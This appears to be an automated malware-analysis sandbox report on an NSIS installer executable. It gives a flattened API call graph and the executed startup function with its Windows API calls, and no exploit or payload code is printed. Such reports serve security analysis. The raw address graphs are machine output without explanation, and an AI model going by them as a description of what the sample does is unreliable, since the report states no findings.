4062a4 17 API calls 3829->3833 3831 405346 3830->3831 3832 40532b lstrlenW 3830->3832 3835 405359 3831->3835 3836 40534c SetWindowTextW 3831->3836 3834 40533d lstrcatW 3832->3834 3832->3837 3833->3830 3834->3831 3835->3837 3838 40535f SendMessageW SendMessageW SendMessageW 3835->3838 3836->3835 3839 405867 CreateProcessW 3837->3839 3838->3837 3840 401f16 3839->3840 3841 40589a CloseHandle 3839->3841 3840->3817 3840->3821 3842 40670d WaitForSingleObject 3840->3842 3841->3840 3843 406727 3842->3843 3844 406739 GetExitCodeProcess 3843->3844 3890 406698 3843->3890 3844->3816 3847->3821 3849 4062b1 3848->3849 3850 4064fc 3849->3850 3853 4064ca lstrlenW 3849->3853 3856 4062a4 10 API calls 3849->3856 3857 4063df GetSystemDirectoryW 3849->3857 3859 4063f2 GetWindowsDirectoryW 3849->3859 3860 406516 5 API calls 3849->3860 3861 40646d lstrcatW 3849->3861 3862 406426 SHGetSpecialFolderLocation 3849->3862 3863 4062a4 10 API calls 3849->3863 3874 406150 3849->3874 3879 4061c9 wsprintfW 3849->3879 3880 406282 lstrcpynW 3849->3880 3851 402c64 3850->3851 3881 406282 lstrcpynW 3850->3881 3851->3826 3865 406516 3851->3865 3853->3849 3856->3853 3857->3849 3859->3849 3860->3849 3861->3849 3862->3849 3864 40643e SHGetPathFromIDListW CoTaskMemFree 3862->3864 3863->3849 3864->3849 3872 406523 3865->3872 3866 406599 3867 40659e CharPrevW 3866->3867 3869 4065bf 3866->3869 3867->3866 3868 40658c CharNextW 3868->3866 3868->3872 3869->3826 3871 406578 CharNextW 3871->3872 3872->3866 3872->3868 3872->3871 3873 406587 CharNextW 3872->3873 3886 405b80 3872->3886 3873->3868 3882 4060ef 3874->3882 3877 406184 RegQueryValueExW RegCloseKey 3878 4061b4 3877->3878 3878->3849 3879->3849 3880->3849 3881->3851 3883 4060fe 3882->3883 3884 406102 3883->3884 3885 406107 RegOpenKeyExW 3883->3885 3884->3877 3884->3878 3885->3884 3887 405b86 3886->3887 3888 405b9c 3887->3888 3889 405b8d CharNextW 3887->3889 3888->3872 3889->3887 3891 4066b5 PeekMessageW 3890->3891 3892 4066c5 WaitForSingleObject 3891->3892 3893 4066ab DispatchMessageW 3891->3893 3892->3843 3893->3891 5258 401000 5259 401037 BeginPaint GetClientRect 5258->5259 5260 40100c DefWindowProcW 5258->5260 5262 4010f3 5259->5262 5265 401179 5260->5265 5263 401073 CreateBrushIndirect FillRect DeleteObject 5262->5263 5264 4010fc 5262->5264 5263->5262 5266 401102 CreateFontIndirectW 5264->5266 5267 401167 EndPaint 5264->5267 5266->5267 5268 401112 6 API calls 5266->5268 5267->5265 5268->5267 4178 100027c2 4179 10002812 4178->4179 4180 100027d2 VirtualProtect 4178->4180 4180->4179 5269 401503 5270 40150b 5269->5270 5272 40151e 5269->5272 5271 402c15 17 API calls 5270->5271 5271->5272 4216 402306 4217 40230e 4216->4217 4220 402314 4216->4220 4218 402c37 17 API calls 4217->4218 4218->4220 4219 402322 4222 402330 4219->4222 4223 402c37 17 API calls 4219->4223 4220->4219 4221 402c37 17 API calls 4220->4221 4221->4219 4224 402c37 17 API calls 4222->4224 4223->4222 4225 402339 WritePrivateProfileStringW 4224->4225 5273 401f86 5274 402c37 17 API calls 5273->5274 5275 401f8d 5274->5275 5276 40665c 5 API calls 5275->5276 5277 401f9c 5276->5277 5278 401fb8 GlobalAlloc 5277->5278 5280 402020 5277->5280 5279 401fcc 5278->5279 5278->5280 5281 40665c 5 API calls 5279->5281 5282 401fd3 5281->5282 5283 40665c 5 API calls 5282->5283 5284 401fdd 5283->5284 5284->5280 5288 4061c9 wsprintfW 5284->5288 5286 402012 5289 4061c9 wsprintfW 5286->5289 5288->5286 5289->5280 4233 402388 4234 402390 4233->4234 4235 4023bb 4233->4235 4245 402c77 4234->4245 4237 402c37 17 API calls 4235->4237 4239 4023c2 4237->4239 4250 402cf5 4239->4250 4240 4023a1 4242 402c37 17 API calls 4240->4242 4243 4023a8 RegDeleteValueW RegCloseKey 4242->4243 4244 4023cf 4243->4244 4246 402c37 17 API calls 4245->4246 4247 402c8e 4246->4247 4248 4060ef RegOpenKeyExW 4247->4248 4249 402397 4248->4249 4249->4240 4249->4244 4251 402d0b 4250->4251 4252 402d21 4251->4252 4254 402d2a 4251->4254 4252->4244 4255 4060ef RegOpenKeyExW 4254->4255 4256 402d58 4255->4256 4257 402dd0 4256->4257 4258 402d5c 4256->4258 4257->4252 4259 402d7e RegEnumKeyW 4258->4259 4260 402d95 RegCloseKey 4258->4260 4261 402db6 RegCloseKey 4258->4261 4263 402d2a 6 API calls 4258->4263 4259->4258 4259->4260 4262 40665c 5 API calls 4260->4262 4261->4257 4264 402da5 4262->4264 4263->4258 4265 402dc4 RegDeleteKeyW 4264->4265 4266 402da9 4264->4266 4265->4257 4266->4257 5290 40190c 5291 401943 5290->5291 5292 402c37 17 API calls 5291->5292 5293 401948 5292->5293 5294 405990 67 API calls 5293->5294 5295 401951 5294->5295 5296 401d0e 5297 402c15 17 API calls 5296->5297 5298 401d15 5297->5298 5299 402c15 17 API calls 5298->5299 5300 401d21 GetDlgItem 5299->5300 5301 40258c 5300->5301 5302 1000164f 5303 10001516 GlobalFree 5302->5303 5305 10001667 5303->5305 5304 100016ad GlobalFree 5305->5304 5306 10001682 5305->5306 5307 10001699 VirtualFree 5305->5307 5306->5304 5307->5304 5308 40190f 5309 402c37 17 API calls 5308->5309 5310 401916 5309->5310 5311 4058e4 MessageBoxIndirectW 5310->5311 5312 40191f 5311->5312 5313 401491 5314 4052e6 24 API calls 5313->5314 5315 401498 5314->5315 5316 402592 5317 4025c1 5316->5317 5318 4025a6 5316->5318 5320 4025f5 5317->5320 5321 4025c6 5317->5321 5319 402c15 17 API calls 5318->5319 5327 4025ad 5319->5327 5323 402c37 17 API calls 5320->5323 5322 402c37 17 API calls 5321->5322 5324 4025cd WideCharToMultiByte lstrlenA 5322->5324 5325 4025fc lstrlenW 5323->5325 5324->5327 5325->5327 5326 402629 5328 405e26 WriteFile 5326->5328 5330 40263f 5326->5330 5327->5326 5329 405e55 5 API calls 5327->5329 5327->5330 5328->5330 5329->5326 5331 10001058 5333 10001074 5331->5333 5332 100010dd 5333->5332 5334 10001516 GlobalFree 5333->5334 5335 10001092 5333->5335 5334->5335 5336 10001516 GlobalFree 5335->5336 5337 100010a2 5336->5337 5338 100010b2 5337->5338 5339 100010a9 GlobalSize 5337->5339 5340 100010b6 GlobalAlloc 5338->5340 5341 100010c7 5338->5341 5339->5338 5342 1000153d 3 API calls 5340->5342 5343 100010d2 GlobalFree 5341->5343 5342->5341 5343->5332 5344 401c19 5345 402c15 17 API calls 5344->5345 5346 401c20 5345->5346 5347 402c15 17 API calls 5346->5347 5348 401c2d 5347->5348 5349 401c42 5348->5349 5350 402c37 17 API calls 5348->5350 5351 401c52 5349->5351 5354 402c37 17 API calls 5349->5354 5350->5349 5352 401ca9 5351->5352 5353 401c5d 5351->5353 5356 402c37 17 API calls 5352->5356 5355 402c15 17 API calls 5353->5355 5354->5351 5357 401c62 5355->5357 5358 401cae 5356->5358 5359 402c15 17 API calls 5357->5359 5360 402c37 17 API calls 5358->5360 5361 401c6e 5359->5361 5362 401cb7 FindWindowExW 5360->5362 5363 401c99 SendMessageW 5361->5363 5364 401c7b SendMessageTimeoutW 5361->5364 5365 401cd9 5362->5365 5363->5365 5364->5365 5366 402a9a SendMessageW 5367 402ab4 InvalidateRect 5366->5367 5368 402abf 5366->5368 5367->5368 5369 40281b 5370 402821 5369->5370 5371 402829 FindClose 5370->5371 5372 402abf 5370->5372 5371->5372 5373 40149e 5374 4022f1 5373->5374 5375 4014ac PostQuitMessage 5373->5375 5375->5374 5376 40469f 5377 4046d5 5376->5377 5378 4046af 5376->5378 5380 40427e 8 API calls 5377->5380 5379 404217 18 API calls 5378->5379 5381 4046bc SetDlgItemTextW 5379->5381 5382 4046e1 5380->5382 5381->5377 5383 100010e1 5384 10001111 5383->5384 5385 100011d8 GlobalFree 5384->5385 5386 100012ba 2 API calls 5384->5386 5387 100011d3 5384->5387 5388 100011f8 GlobalFree 5384->5388 5389 10001272 2 API calls 5384->5389 5390 10001164 GlobalAlloc 5384->5390 5391 100012e1 lstrcpyW 5384->5391 5392 100011c4 GlobalFree 5384->5392 5386->5384 5387->5385 5388->5384 5389->5392 5390->5384 5391->5384 5392->5384 5393 4015a3 5394 402c37 17 API calls 5393->5394 5395 4015aa SetFileAttributesW 5394->5395 5396 4015bc 5395->5396 5397 405425 5398 405446 GetDlgItem GetDlgItem GetDlgItem 5397->5398 5399 4055cf 5397->5399 5442 40424c SendMessageW 5398->5442 5401 405600 5399->5401 5402 4055d8 GetDlgItem CreateThread CloseHandle 5399->5402 5403 40562b 5401->5403 5404 405650 5401->5404 5405 405617 ShowWindow ShowWindow 5401->5405 5402->5401 5408 405665 ShowWindow 5403->5408 5409 40563f 5403->5409 5412 40568b 5403->5412 5410 40427e 8 API calls 5404->5410 5444 40424c SendMessageW 5405->5444 5406 4054b6 5411 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 5406->5411 5416 405685 5408->5416 5417 405677 5408->5417 5414 4041f0 SendMessageW 5409->5414 5415 40565e 5410->5415 5418 40552b 5411->5418 5419 40550f SendMessageW SendMessageW 5411->5419 5412->5404 5413 405699 SendMessageW 5412->5413 5413->5415 5420 4056b2 CreatePopupMenu 5413->5420 5414->5404 5424 4041f0 SendMessageW 5416->5424 5423 4052e6 24 API calls 5417->5423 5421 405530 SendMessageW 5418->5421 5422 40553e 5418->5422 5419->5418 5425 4062a4 17 API calls 5420->5425 5421->5422 5426 404217 18 API calls 5422->5426 5423->5416 5424->5412 5427 4056c2 AppendMenuW 5425->5427 5428 40554e 5426->5428 5429 4056f2 TrackPopupMenu 5427->5429 5430 4056df GetWindowRect 5427->5430 5431 405557 ShowWindow 5428->5431 5432 40558b GetDlgItem SendMessageW 5428->5432 5429->5415 5433 40570d 5429->5433 5430->5429 5434 40556d ShowWindow 5431->5434 5437 40557a 5431->5437 5432->5415 5435 4055b2 SendMessageW SendMessageW 5432->5435 5436 405729 SendMessageW 5433->5436 5434->5437 5435->5415 5436->5436 5438 405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5436->5438 5443 40424c SendMessageW 5437->5443 5440 40576b SendMessageW 5438->5440 5440->5440 5441 405794 GlobalUnlock SetClipboardData CloseClipboard 5440->5441 5441->5415 5442->5406 5443->5432 5444->5403 5445 4028a7 5446 402c37 17 API calls 5445->5446 5447 4028b5 5446->5447 5448 4028cb 5447->5448 5450 402c37 17 API calls 5447->5450 5449 405d4f 2 API calls 5448->5449 5451 4028d1 5449->5451 5450->5448 5473 405d74 GetFileAttributesW CreateFileW 5451->5473 5453 4028de 5454 402981 5453->5454 5455 4028ea GlobalAlloc 5453->5455 5458 402989 DeleteFileW 5454->5458 5459 40299c 5454->5459 5456 402903 5455->5456 5457 402978 CloseHandle 5455->5457 5474 40332b SetFilePointer 5456->5474 5457->5454 5458->5459 5461 402909 5462 403315 ReadFile 5461->5462 5463 402912 GlobalAlloc 5462->5463 5464 402922 5463->5464 5465 402956 5463->5465 5467 4030fa 31 API calls 5464->5467 5466 405e26 WriteFile 5465->5466 5468 402962 GlobalFree 5466->5468 5472 40292f 5467->5472 5469 4030fa 31 API calls 5468->5469 5471 402975 5469->5471 5470 40294d GlobalFree 5470->5465 5471->5457 5472->5470 5473->5453 5474->5461 4276 4058aa ShellExecuteExW 5475 40432b lstrcpynW lstrlenW 4277 40202c 4278 40203e 4277->4278 4288 4020f0 4277->4288 4279 402c37 17 API calls 4278->4279 4281 402045 4279->4281 4280 401423 24 API calls 4284 40224a 4280->4284 4282 402c37 17 API calls 4281->4282 4283 40204e 4282->4283 4285 402064 LoadLibraryExW 4283->4285 4286 402056 GetModuleHandleW 4283->4286 4287 402075 4285->4287 4285->4288 4286->4285 4286->4287 4300 4066cb WideCharToMultiByte 4287->4300 4288->4280 4291 402086 4294 4020a5 4291->4294 4295 40208e 4291->4295 4292 4020bf 4293 4052e6 24 API calls 4292->4293 4296 402096 4293->4296 4303 10001759 4294->4303 4297 401423 24 API calls 4295->4297 4296->4284 4298 4020e2 FreeLibrary 4296->4298 4297->4296 4298->4284 4301 4066f5 GetProcAddress 4300->4301 4302 402080 4300->4302 4301->4302 4302->4291 4302->4292 4304 10001789 4303->4304 4345 10001b18 4304->4345 4306 10001790 4307 100018a6 4306->4307 4308 100017a1 4306->4308 4309 100017a8 4306->4309 4307->4296 4393 10002286 4308->4393 4377 100022d0 4309->4377 4314 1000180c 4320 10001812 4314->4320 4321 1000184e 4314->4321 4315 100017ee 4406 100024a4 4315->4406 4316 100017d7 4330 100017cd 4316->4330 4403 10002b57 4316->4403 4317 100017be 4319 100017c4 4317->4319 4323 100017cf 4317->4323 4319->4330 4387 1000289c 4319->4387 4325 100015b4 3 API calls 4320->4325 4327 100024a4 10 API calls 4321->4327 4322 100017f4 4417 100015b4 4322->4417 4397 10002640 4323->4397 4332 10001828 4325->4332 4328 10001840 4327->4328 4344 10001895 4328->4344 4428 10002467 4328->4428 4330->4314 4330->4315 4335 100024a4 10 API calls 4332->4335 4334 100017d5 4334->4330 4335->4328 4339 1000189f GlobalFree 4339->4307 4341 10001881 4341->4344 4432 1000153d wsprintfW 4341->4432 4342 1000187a FreeLibrary 4342->4341 4344->4307 4344->4339 4435 1000121b GlobalAlloc 4345->4435 4347 10001b3c 4436 1000121b GlobalAlloc 4347->4436 4349 10001d7a GlobalFree GlobalFree GlobalFree 4350 10001d97 4349->4350 4367 10001de1 4349->4367 4351 100020ee 4350->4351 4360 10001dac 4350->4360 4350->4367 4353 10002110 GetModuleHandleW 4351->4353 4351->4367 4352 10001c1d GlobalAlloc 4372 10001b47 4352->4372 4355 10002121 LoadLibraryW 4353->4355 4356 10002136 4353->4356 4354 10001c86 GlobalFree 4354->4372 4355->4356 4355->4367 4443 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4356->4443 4357 10001c68 lstrcpyW 4358 10001c72 lstrcpyW 4357->4358 4358->4372 4360->4367 4439 1000122c 4360->4439 4361 10002188 4362 10002195 lstrlenW 4361->4362 4361->4367 4444 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4362->4444 4364 10002048 4364->4367 4369 10002090 lstrcpyW 4364->4369 4367->4306 4368 10002148 4368->4361 4376 10002172 GetProcAddress 4368->4376 4369->4367 4370 10001cc4 4370->4372 4437 1000158f GlobalSize GlobalAlloc 4370->4437 4371 10001f37 GlobalFree 4371->4372 4372->4349 4372->4352 4372->4354 4372->4357 4372->4358 4372->4364 4372->4367 4372->4370 4372->4371 4375 1000122c 2 API calls 4372->4375 4442 1000121b GlobalAlloc 4372->4442 4373 100021af 4373->4367 4375->4372 4376->4361 4385 100022e8 4377->4385 4379 10002410 GlobalFree 4382 100017ae 4379->4382 4379->4385 4380 100023ba GlobalAlloc 4383 100023d1 4380->4383 4381 1000238f GlobalAlloc WideCharToMultiByte 4381->4379 4382->4316 4382->4317 4382->4330 4383->4379 4450 100025d4 4383->4450 4384 1000122c GlobalAlloc lstrcpynW 4384->4385 4385->4379 4385->4380 4385->4381 4385->4383 4385->4384 4446 100012ba 4385->4446 4388 100028ae 4387->4388 4389 10002953 SetFilePointer 4388->4389 4390 10002971 4389->4390 4391 10002a62 GetLastError 4390->4391 4392 10002a6d 4390->4392 4391->4392 4392->4330 4394 10002296 4393->4394 4395 100017a7 4393->4395 4394->4395 4396 100022a8 GlobalAlloc 4394->4396 4395->4309 4396->4394 4401 1000265c 4397->4401 4398 100026c0 4400 100026c5 GlobalSize 4398->4400 4402 100026cf 4398->4402 4399 100026ad GlobalAlloc 4399->4402 4400->4402 4401->4398 4401->4399 4402->4334 4404 10002b62 4403->4404 4405 10002ba2 GlobalFree 4404->4405 4453 1000121b GlobalAlloc 4406->4453 4408 10002506 MultiByteToWideChar 4412 100024ae 4408->4412 4409 1000252b StringFromGUID2 4409->4412 4410 1000253c lstrcpynW 4410->4412 4411 1000254f wsprintfW 4411->4412 4412->4408 4412->4409 4412->4410 4412->4411 4413 1000256c GlobalFree 4412->4413 4414 100025a7 GlobalFree 4412->4414 4415 10001272 2 API calls 4412->4415 4454 100012e1 4412->4454 4413->4412 4414->4322 4415->4412 4458 1000121b GlobalAlloc 4417->4458 4419 100015ba 4420 100015c7 lstrcpyW 4419->4420 4422 100015e1 4419->4422 4423 100015fb 4420->4423 4422->4423 4424 100015e6 wsprintfW 4422->4424 4425 10001272 4423->4425 4424->4423 4426 100012b5 GlobalFree 4425->4426 4427 1000127b GlobalAlloc lstrcpynW 4425->4427 4426->4328 4427->4426 4429 10002475 4428->4429 4431 10001861 4428->4431 4430 10002491 GlobalFree 4429->4430 4429->4431 4430->4429 4431->4341 4431->4342 4433 10001272 2 API calls 4432->4433 4434 1000155e 4433->4434 4434->4344 4435->4347 4436->4372 4438 100015ad 4437->4438 4438->4370 4445 1000121b GlobalAlloc 4439->4445 4441 1000123b lstrcpynW 4441->4367 4442->4372 4443->4368 4444->4373 4445->4441 4447 100012c1 4446->4447 4448 1000122c 2 API calls 4447->4448 4449 100012df 4448->4449 4449->4385 4451 100025e2 VirtualAlloc 4450->4451 4452 10002638 4450->4452 4451->4452 4452->4383 4453->4412 4455 100012ea 4454->4455 4456 1000130c 4454->4456 4455->4456 4457 100012f0 lstrcpyW 4455->4457 4456->4412 4457->4456 4458->4419 5476 402a2f 5477 402c15 17 API calls 5476->5477 5478 402a35 5477->5478 5479 402a6c 5478->5479 5481 402885 5478->5481 5482 402a47 5478->5482 5480 4062a4 17 API calls 5479->5480 5479->5481 5480->5481 5482->5481 5484 4061c9 wsprintfW 5482->5484 5484->5481 5485 401a30 5486 402c37 17 API calls 5485->5486 5487 401a39 ExpandEnvironmentStringsW 5486->5487 5488 401a4d 5487->5488 5490 401a60 5487->5490 5489 401a52 lstrcmpW 5488->5489 5488->5490 5489->5490 5496 401db3 GetDC 5497 402c15 17 API calls 5496->5497 5498 401dc5 GetDeviceCaps MulDiv ReleaseDC 5497->5498 5499 402c15 17 API calls 5498->5499 5500 401df6 5499->5500 5501 4062a4 17 API calls 5500->5501 5502 401e33 CreateFontIndirectW 5501->5502 5503 40258c 5502->5503 5504 4043b4 5505 4044e6 5504->5505 5507 4043cc 5504->5507 5506 404550 5505->5506 5508 40461a 5505->5508 5513 404521 GetDlgItem SendMessageW 5505->5513 5506->5508 5509 40455a GetDlgItem 5506->5509 5510 404217 18 API calls 5507->5510 5515 40427e 8 API calls 5508->5515 5511 404574 5509->5511 5512 4045db 5509->5512 5514 404433 5510->5514 5511->5512 5517 40459a SendMessageW LoadCursorW SetCursor 5511->5517 5512->5508 5518 4045ed 5512->5518 5537 404239 EnableWindow 5513->5537 5520 404217 18 API calls 5514->5520 5516 404615 5515->5516 5538 404663 5517->5538 5522 404603 5518->5522 5523 4045f3 SendMessageW 5518->5523 5525 404440 CheckDlgButton 5520->5525 5522->5516 5527 404609 SendMessageW 5522->5527 5523->5522 5524 40454b 5528 40463f SendMessageW 5524->5528 5535 404239 EnableWindow 5525->5535 5527->5516 5528->5506 5530 40445e GetDlgItem 5536 40424c SendMessageW 5530->5536 5532 404474 SendMessageW 5533 404491 GetSysColor 5532->5533 5534 40449a SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5532->5534 5533->5534 5534->5516 5535->5530 5536->5532 5537->5524 5541 4058aa ShellExecuteExW 5538->5541 5540 4045c9 LoadCursorW SetCursor 5540->5512 5541->5540 5542 402835 5543 40283d 5542->5543 5544 402841 FindNextFileW 5543->5544 5545 402853 5543->5545 5544->5545 5547 4029e0 5545->5547 5548 406282 lstrcpynW 5545->5548 5548->5547 5549 401735 5550 402c37 17 API calls 5549->5550 5551 40173c SearchPathW 5550->5551 5552 4029e0 5551->5552 5553 401757 5551->5553 5553->5552 5555 406282 lstrcpynW 5553->5555 5555->5552 5556 10002a77 5557 10002a8f 5556->5557 5558 1000158f 2 API calls 5557->5558 5559 10002aaa 5558->5559 5560 4014b8 5561 4014be 5560->5561 5562 401389 2 API calls 5561->5562 5563 4014c6 5562->5563 5564 404a3c 5565 404a68 5564->5565 5566 404a4c 5564->5566 5568 404a9b 5565->5568 5569 404a6e SHGetPathFromIDListW 5565->5569 5575 4058c8 GetDlgItemTextW 5566->5575 5571 404a85 SendMessageW 5569->5571 5572 404a7e 5569->5572 5570 404a59 SendMessageW 5570->5565 5571->5568 5573 40140b 2 API calls 5572->5573 5573->5571 5575->5570 4844 403d3e 4845 403e91 4844->4845 4846 403d56 4844->4846 4848 403ea2 GetDlgItem GetDlgItem 4845->4848 4849 403ee2 4845->4849 4846->4845 4847 403d62 4846->4847 4850 403d80 4847->4850 4851 403d6d SetWindowPos 4847->4851 4852 404217 18 API calls 4848->4852 4853 403f3c 4849->4853 4862 401389 2 API calls 4849->4862 4855 403d85 ShowWindow 4850->4855 4856 403d9d 4850->4856 4851->4850 4857 403ecc SetClassLongW 4852->4857 4854 404263 SendMessageW 4853->4854 4858 403e8c 4853->4858 4885 403f4e 4854->4885 4855->4856 4859 403da5 DestroyWindow 4856->4859 4860 403dbf 4856->4860 4861 40140b 2 API calls 4857->4861 4863 4041c1 4859->4863 4864 403dc4 SetWindowLongW 4860->4864 4865 403dd5 4860->4865 4861->4849 4866 403f14 4862->4866 4863->4858 4873 4041d1 ShowWindow 4863->4873 4864->4858 4870 403de1 GetDlgItem 4865->4870 4871 403e7e 4865->4871 4866->4853 4867 403f18 SendMessageW 4866->4867 4867->4858 4868 40140b 2 API calls 4868->4885 4869 4041a2 DestroyWindow EndDialog 4869->4863 4874 403e11 4870->4874 4875 403df4 SendMessageW IsWindowEnabled 4870->4875 4872 40427e 8 API calls 4871->4872 4872->4858 4873->4858 4877 403e1e 4874->4877 4878 403e65 SendMessageW 4874->4878 4879 403e31 4874->4879 4888 403e16 4874->4888 4875->4858 4875->4874 4876 4062a4 17 API calls 4876->4885 4877->4878 4877->4888 4878->4871 4882 403e39 4879->4882 4883 403e4e 4879->4883 4881 404217 18 API calls 4881->4885 4886 40140b 2 API calls 4882->4886 4887 40140b 2 API calls 4883->4887 4884 403e4c 4884->4871 4885->4858 4885->4868 4885->4869 4885->4876 4885->4881 4890 404217 18 API calls 4885->4890 4906 4040e2 DestroyWindow 4885->4906 4886->4888 4889 403e55 4887->4889 4919 4041f0 4888->4919 4889->4871 4889->4888 4891 403fc9 GetDlgItem 4890->4891 4892 403fe6 ShowWindow KiUserCallbackDispatcher 4891->4892 4893 403fde 4891->4893 4916 404239 EnableWindow 4892->4916 4893->4892 4895 404010 EnableWindow 4900 404024 4895->4900 4896 404029 GetSystemMenu EnableMenuItem SendMessageW 4897 404059 SendMessageW 4896->4897 4896->4900 4897->4900 4899 403d1f 18 API calls 4899->4900 4900->4896 4900->4899 4917 40424c SendMessageW 4900->4917 4918 406282 lstrcpynW 4900->4918 4902 404088 lstrlenW 4903 4062a4 17 API calls 4902->4903 4904 40409e SetWindowTextW 4903->4904 4905 401389 2 API calls 4904->4905 4905->4885 4906->4863 4907 4040fc CreateDialogParamW 4906->4907 4907->4863 4908 40412f 4907->4908 4909 404217 18 API calls 4908->4909 4910 40413a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4909->4910 4911 401389 2 API calls 4910->4911 4912 404180 4911->4912 4912->4858 4913 404188 ShowWindow 4912->4913 4914 404263 SendMessageW 4913->4914 4915 4041a0 4914->4915 4915->4863 4916->4895 4917->4900 4918->4902 4920 4041f7 4919->4920 4921 4041fd SendMessageW 4919->4921 4920->4921 4921->4884

                                                  Executed Functions

                                                  Function 00403373 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412stringfilecomCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 403373-4033b0 SetErrorMode GetVersion 1 4033b2-4033ba call 40665c 0->1 2 4033c3 0->2 1->2 7 4033bc 1->7 3 4033c8-4033dc call 4065ec lstrlenA 2->3 9 4033de-4033fa call 40665c * 3 3->9 7->2 16 40340b-40346c #17 OleInitialize SHGetFileInfoW call 406282 GetCommandLineW call 406282 GetModuleHandleW 9->16 17 4033fc-403402 9->17 24 403476-403490 call 405b80 CharNextW 16->24 25 40346e-403475 16->25 17->16 21 403404 17->21 21->16 28 403496-40349c 24->28 29 4035a7-4035c1 GetTempPathW call 403342 24->29 25->24 31 4034a5-4034a9 28->31 32 40349e-4034a3 28->32 36 4035c3-4035e1 GetWindowsDirectoryW lstrcatW call 403342 29->36 37 403619-403633 DeleteFileW call 402ec1 29->37 34 4034b0-4034b4 31->34 35 4034ab-4034af 31->35 32->31 32->32 38 403573-403580 call 405b80 34->38 39 4034ba-4034c0 34->39 35->34 36->37 54 4035e3-403613 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403342 36->54 57 4036e4-4036f4 call 4038b6 OleUninitialize 37->57 58 403639-40363f 37->58 55 403582-403583 38->55 56 403584-40358a 38->56 40 4034c2-4034ca 39->40 41 4034db-403514 39->41 45 4034d1 40->45 46 4034cc-4034cf 40->46 47 403531-40356b 41->47 48 403516-40351b 41->48 45->41 46->41 46->45 47->38 53 40356d-403571 47->53 48->47 52 40351d-403525 48->52 62 403527-40352a 52->62 63 40352c 52->63 53->38 64 403592-4035a0 call 406282 53->64 54->37 54->57 55->56 56->28 66 403590 56->66 75 40381a-403820 57->75 76 4036fa-40370a call 4058e4 ExitProcess 57->76 59 4036d4-4036db call 403990 58->59 60 403645-403650 call 405b80 58->60 74 4036e0 59->74 77 403652-403687 60->77 78 40369e-4036a8 60->78 62->47 62->63 63->47 67 4035a5 64->67 66->67 67->29 74->57 80 403822-403838 GetCurrentProcess OpenProcessToken 75->80 81 40389e-4038a6 75->81 82 403689-40368d 77->82 85 403710-403724 call 40584f lstrcatW 78->85 86 4036aa-4036b8 call 405c5b 78->86 88 40383a-403868 LookupPrivilegeValueW AdjustTokenPrivileges 80->88 89 40386e-40387c call 40665c 80->89 83 4038a8 81->83 84 4038ac-4038b0 ExitProcess 81->84 90 403696-40369a 82->90 91 40368f-403694 82->91 83->84 102 403731-40374b lstrcatW lstrcmpiW 85->102 103 403726-40372c lstrcatW 85->103 86->57 101 4036ba-4036d0 call 406282 * 2 86->101 88->89 99 40388a-403895 ExitWindowsEx 89->99 100 40387e-403888 89->100 90->82 96 40369c 90->96 91->90 91->96 96->78 99->81 104 403897-403899 call 40140b 99->104 100->99 100->104 101->59 102->57 106 40374d-403750 102->106 103->102 104->81 107 403752-403757 call 4057b5 106->107 108 403759 call 405832 106->108 117 40375e-40376c SetCurrentDirectoryW 107->117 108->117 118 403779-4037a2 call 406282 117->118 119 40376e-403774 call 406282 117->119 123 4037a7-4037c3 call 4062a4 DeleteFileW 118->123 119->118 126 403804-40380c 123->126 127 4037c5-4037d5 CopyFileW 123->127 126->123 128 40380e-403815 call 406048 126->128 127->126 129 4037d7-4037f7 call 406048 call 4062a4 call 405867 127->129 128->57 129->126 138 4037f9-403800 CloseHandle 129->138 138->126
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403396
                                                  • GetVersion.KERNEL32 ref: 0040339C
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                  • OleInitialize.OLE32(00000000), ref: 00403413
                                                  • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                  • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\3507071243740008011.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                    • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                    • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035D5
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F1
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                    • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                  • ExitProcess.KERNEL32 ref: 0040370A
